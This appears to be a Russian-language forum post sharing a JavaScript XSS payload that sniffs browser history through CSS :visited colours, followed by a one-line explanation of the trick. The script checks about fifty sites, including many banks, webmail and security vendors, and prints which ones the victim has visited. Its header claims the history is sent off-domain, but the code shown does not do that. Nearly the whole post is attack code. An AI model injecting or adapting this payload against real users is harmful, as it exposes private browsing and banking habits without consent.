Сабж.
Код: |
<script>
// Browser detection: lower-cased UA string and a flag that is true when it contains "mozilla".
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);
// popular websites. Lookup if user has visited any.
// This is the probe list walked one URL at a time by stealHistory() below.
// As given in the original: "http://www.myspace.com/" appears twice and the last
// entry has a single slash after "https:".
var websites = [
  "http://login.yahoo.com/",
  "http://www.jailbabes.com",
  "http://ha.ckers.org",
  "http://seoblackhat.com",
  "http://www.cgisecurity.com",
  "http://www.spidynamics.com",
  "http://www.cenzic.com",
  "http://www.watchfire.com",
  "http://www.ntobjectives.com",
  "http://www.webappsec.org",
  "http://www.whitehatsec.com",
  "http://english.aljazeera.net/HomePage",
  "http://mail.google.com/",
  "http://mail.yahoo.com/",
  "http://my.yahoo.com/",
  "http://slashdot.org/",
  "http://www.myspace.com/",
  "http://www.amazon.com/",
  "http://www.aol.com/",
  "http://www.bankofamerica.com/",
  "http://www.bankone.com/",
  "http://www.blackhat.com/",
  "http://www.blogger.com/",
  "http://www.bofa.com/",
  "http://www.capitalone.com/",
  "http://www.chase.com/",
  "http://www.citibank.com/",
  "http://www.cnn.com/",
  "http://www.comerica.com/",
  "http://www.e-gold.com/",
  "http://www.ebay.com/",
  "http://www.etrade.com/",
  "http://www.google.com/",
  "http://www.hsbc.com/",
  "http://www.icq.com/",
  "http://www.microsoft.com/",
  "http://www.msn.com/",
  "http://www.myspace.com/",
  "http://www.passport.net/",
  "http://www.paypal.com/",
  "http://www.sourceforge.net/",
  "http://www.statefarm.com/",
  "http://www.usbank.com/",
  "http://www.wachovia.com/",
  "http://www.wamu.com/",
  "http://www.wellsfargo.com/",
  "http://www.xanga.com/",
  "http://www.yahoo.com/",
  "https://commerce.blackhat.com/",
  "https:/banking.wellsfargo.com/",
];
/* prevent multiple XSS loads */
// A <div id="xss_flag"> appended to <body> marks that this script has already run in the document.
if (!document.getElementById('xss_flag')) {
  var d = document.createElement('div');
  d.id = 'xss_flag';
  document.body.appendChild(d);
  // A <table id="data"> is also appended, but nothing in this script writes into it.
  // `d` is simply redeclared with var here: same variable, new element.
  var d = document.createElement('table');
  d.border = 0;
  d.cellpadding = 5;
  d.cellspacing = 10;
  d.width = '90%';
  d.align = 'center';
  d.id = 'data';
  document.body.appendChild(d);
  // Inject a stylesheet that gives each probe anchor (#id0, #id1, ...) a distinctive
  // :visited colour (#0000FF), which stealHistory() later reads back as a computed style.
  // NOTE(review): document.write() issued after parsing has finished replaces the
  // whole document, so this presumably runs inline while the page is still being parsed — verify.
  document.write('<style>');
  for (var i = 0; i < websites.length; i++) {
    document.write('#id' + i + ":visited {color: #0000FF;}");
  }
  document.write('</style>');
  /* launch steal history */
  // Only browsers whose UA contains "mozilla" are probed (see is_mozilla above).
  if (is_mozilla) {
    stealHistory();
  }
}
/*--- [method: stealHistory] -------------------------------------------
## Description: Send a browsers history to an off-domain URL.
#-----------------------------------------------------------------------
NOTE(review): despite that description, the visible code never contacts
another origin; each URL judged "visited" is only written into the
current document as an <li> entry by document.write().
-----------------------------------------------------------------------*/
function stealHistory() {
  // loop through websites and check which ones have been visited
  for (var i = 0; i < websites.length; i++) {
    // Build a temporary anchor whose id matches the injected "#idN:visited" rule,
    // attach it, read its rendered colour, then detach it again.
    var link = document.createElement("a");
    link.id = "id" + i;
    link.href = websites[i];
    link.innerHTML = websites[i];
    document.body.appendChild(link);
    var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
    document.body.removeChild(link);
    // check for visited
    // "rgb(0, 0, 255)" is the serialised form of the #0000FF :visited colour set above.
    // NOTE(review): browsers that ship the :visited privacy mitigation report the
    // unvisited colour from getComputedStyle, so this comparison fails on such engines.
    if (color == "rgb(0, 0, 255)") {
      document.write('<li><a href="' + websites[i] + '">' + websites[i] + '</a></li>');
    } // end visited check
  } // end visited website loop
} // end stealHistory method
</script>
да, он проверяет, каким цветом нарисовались ссылки, если цветом link:visited - значит, юзер был на этом сайте... |